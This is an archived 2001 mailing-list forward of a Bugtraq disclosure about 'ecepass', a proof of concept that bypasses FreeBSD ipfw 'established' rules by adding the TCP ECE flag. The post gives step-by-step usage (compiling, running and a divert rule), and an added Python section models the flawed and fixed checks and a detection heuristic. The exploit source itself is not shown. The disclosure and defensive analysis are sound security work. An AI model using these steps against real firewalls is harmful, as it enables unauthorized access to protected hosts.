Date:      Mon, 29 Jan 2001 11:18:44 -0500 (COT)
From:      Buliwyf McGraw <buliwyf@libertad.univalle.edu.co>
To:        freebsd-security@FreeBSD.ORG
Subject:   ecepass - proof of concept code for FreeBSD ipfw bypass (fwd)
Message-ID:  <Pine.BSF.4.21.0101291118150.26984-101000@libertad.univalle.edu.co>


[-- Attachment #1 --]

 Very interesting...

---------- Forwarded message ----------
Date: Thu, 25 Jan 2001 15:04:30 +0200
From: Roelof Temmingh <roelof@SENSEPOST.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: ecepass - proof of concept code for FreeBSD ipfw bypass

An all ZA production...;)

FreeBSD ipfw+ECE proof of concept code
--------------------------------------

Code written by:
Plathond (jacques4i@yahoo.com) for Sensepost (http://www.sensepost.com,
info@sensepost.com)

More info on the problem:
http://packetstorm.securify.com/advisories/freebsd/FreeBSD-SA-01:08.ipfw

Original problem found by:
Aragon Gouveia <aragon@phat.za.net>

How it works:
-------------
Using a FreeBSD divert rule, all outgoing traffic (or as specified in
the ipfw rule) will be diverted to the ecepass process, and the ECE flag will
be added. Traffic directed to hosts behind an ipfw-based firewall will be
passed, rendering the firewall useless if it makes use of the "allow
all from any to any established" rule. Tried & tested...

How to use:
-----------
1. Make sure your kernel is compiled with the following options:
 options         IPDIVERT
 options         IPFIREWALL

2. gcc -o ecepass ecepass.c

3. ./ecepass &

4. ipfw add 5 divert 7000 tcp from any to any

5. All TCP traffic will now have the ECE flag added to it.


PS1: obviously you need to make sure that the last ipfw rule allows
     traffic e.g.:
     00001 divert 7000 tcp from any to any
     65535 allow ip from any to any

PS2: as the exploit uses "ipfw divert" it only works on FreeBSD.
     Ironic eh?

spidermark: sensepostdata ece


Regards,
Roelof.

------------------------------------------------------
Roelof W Temmingh    SensePost IT security
roelof@sensepost.com    +27 83 448 6996
http://www.sensepost.com
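The bypass described in the forwarded post comes down to how a firewall decides that a TCP segment belongs to an "established" connection. The following Python example is added here and is not the ecepass code (which is only present as an unreadable attachment) nor FreeBSD's ipfw source. It parses raw TCP headers, contrasts a hypothetical flawed "established" predicate (anything that is not a bare SYN passes, so the ECE bit alone is enough) with the check documented in ipfw(8) (ACK or RST must be set, ECN bits are ignored), and adds a detection heuristic for SYNs that carry ECE without CWR, which is not the RFC 3168 ECN-setup pattern. The flawed predicate is a model of the bug class, not a claim about the exact ipfw code; all sample segments are constructed inline.

```python
import struct

# TCP flag bits in header byte 13 (RFC 793; ECE/CWR added by RFC 3168).
TH_FIN, TH_SYN, TH_RST, TH_PUSH, TH_ACK, TH_URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20
TH_ECE, TH_CWR = 0x40, 0x80


def make_tcp_header(sport, dport, flags, seq=1, ack=0):
    """Constructed 20-byte TCP header (checksum left zero; only flags matter here)."""
    return struct.pack("!HHIIHHHH", sport, dport, seq, ack, (5 << 12) | flags, 65535, 0, 0)


def tcp_flags(segment):
    """Flags byte of a raw TCP segment: byte 12 is the data offset, byte 13 the flags."""
    if len(segment) < 20:
        raise ValueError("truncated TCP header")
    return segment[13]


def established_flawed(flags):
    """Hypothetical model of the bug class: 'established' is taken to mean
    'anything that is not a bare SYN', so any extra bit, including ECE,
    makes a handshake SYN look like part of an existing connection."""
    return (flags & ~TH_SYN & 0xFF) != 0


def established_fixed(flags):
    """ipfw(8) semantics: 'established' matches segments with ACK or RST set.
    ECE/CWR are never consulted, so a SYN with ECN bits stays a SYN."""
    return (flags & (TH_ACK | TH_RST)) != 0


def verdict(segment, established):
    """Model of the rule pair from the post: 'allow tcp established', then deny."""
    return "allow" if established(tcp_flags(segment)) else "deny"


def ecn_setup_anomaly(flags):
    """Detection heuristic: a SYN (no ACK) carrying ECE but not CWR is not an
    RFC 3168 ECN-setup SYN (which sets both). Bulk ECE tagging of outgoing
    traffic, as the post describes, produces exactly this pattern."""
    return (flags & (TH_SYN | TH_ACK)) == TH_SYN and (flags & (TH_ECE | TH_CWR)) == TH_ECE


# Constructed sample traffic: a normal SYN, the same SYN with ECE added,
# a legitimate ECN-setup SYN, and a data ACK from an existing connection.
SAMPLES = {
    "plain_syn": make_tcp_header(40000, 22, TH_SYN),
    "syn_plus_ece": make_tcp_header(40000, 22, TH_SYN | TH_ECE),
    "ecn_setup_syn": make_tcp_header(40000, 22, TH_SYN | TH_ECE | TH_CWR),
    "data_ack": make_tcp_header(22, 40000, TH_ACK | TH_PUSH, seq=100, ack=200),
}


def audit(samples=SAMPLES):
    """Return {name: (flawed verdict, fixed verdict, anomaly flag)} per sample."""
    return {
        name: (
            verdict(seg, established_flawed),
            verdict(seg, established_fixed),
            ecn_setup_anomaly(tcp_flags(seg)),
        )
        for name, seg in samples.items()
    }


if __name__ == "__main__":
    for name, (flawed, fixed, anomaly) in audit().items():
        print(f"{name:14s} flawed={flawed:5s} fixed={fixed:5s} anomaly={anomaly}")
```

Running the block shows the SYN with ECE added passing the flawed predicate and being denied by the ACK-or-RST check, while the genuine ECN-setup SYN is also denied by the fixed check but does not trip the anomaly heuristic; the heuristic is a coarse indicator of ECE tagging on outgoing SYNs, not proof of the tool being used.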

[-- Attachment #2 --]